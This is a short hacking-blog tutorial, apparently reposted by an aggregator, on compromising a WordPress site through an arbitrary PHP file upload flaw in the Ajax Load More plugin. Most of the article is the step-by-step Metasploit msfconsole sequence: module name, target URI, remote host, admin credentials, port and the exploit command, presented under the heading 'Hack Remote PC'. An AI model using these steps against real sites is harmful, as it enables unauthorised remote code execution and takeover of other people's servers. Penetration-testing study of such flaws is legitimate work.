Channel: Hacking Articles|Raj Chandel's Blog

↧

Hack Remote PC using Wordpress Ajax Load More PHP Upload Vulnerability

April 26, 2016, 9:43 am

≫ Next: Hack Remote PC using Wordpress Work the Flow Upload Vulnerability

≪ Previous: Hack Remote PC using WordPress Reflex Gallery Upload Vulnerability

This module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows uploading arbitrary php files and getting remote code execution. This module has been tested successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.

Exploit Targets

WordPress Ajax Load More 2.8.0

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_ajax_load_more_file_upload

msf exploit (wp_ajax_load_more_file_upload)>set targeturi wordpress

msf exploit (wp_ajax_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_ajax_load_more_file_upload)>set wp_username admin

msf exploit (wp_ajax_load_more_file_upload)>set wp_password admin123

msf exploit (wp_ajax_load_more_file_upload)>set rport 80

msf exploit (wp_ajax_load_more_file_upload)>exploit

↧

Trending Articles

SnapTube - YouTube Downloader HD Video Final v4.48.0.4482310 [Mod]

September 12, 2018, 10:55 am

Black Angus Grilled Artichokes

July 16, 2016, 4:37 pm

Who died from the T.V. Show pawn stars ?? #pawnstars

September 5, 2011, 2:31 pm

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Kundi Mat Khadkao Raja Lyrics Translation | Gabbar is Back

April 27, 2015, 11:03 am

Mp3 Download: Mmatema Moremi - Ke Lerato

December 6, 2017, 6:52 am

Office 365: Auto-Expanding Archives FAQ

April 9, 2018, 9:23 am

Karimnagar District Police Office Mobile Numbers List in Telangana State

April 13, 2017, 3:10 am

NCERT Solutions for Class 9th Sanskrit Chapter 3 पाथेयम्

December 22, 2016, 3:50 am

CSC GUIDELINES IN PHILIPPINE PASSPORT SIZE ID PHOTO AS DEPED REQUIREMENT

April 12, 2017, 3:35 am

High police presence reported in Broadfield including helicopter

October 17, 2014, 8:31 am

Police helicopter searches for Crawley suspect who made off from...

January 10, 2014, 7:55 am

Who Is Sisanda Jonas? | Biography| Profile| History Of South African Media...

June 22, 2017, 7:22 pm

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

August 20, 2016, 5:13 pm

LINKIN PARK – From Zero [iTunes Plus M4A]

November 14, 2024, 1:23 pm

Yesenia Carballido Arrested by Miami-Dade County Corrections on Jan 03, 2020

January 3, 2020, 12:00 am

Daru and Sharab Status for Sharabi Friends in Hindi, Punjabi

March 17, 2020, 5:00 am

[GET] Ayesha Santos – Powerhouse Portfolio ($359.00)

May 17, 2025, 12:45 am

Field Hockey Tactics and Strategies Set

November 14, 2015, 10:00 pm

Inception 2010 Hindi Dual Audio 650MB BRRip 720p ESubs HEVC

December 27, 2016, 4:23 pm

© 2025 //www.rssing.com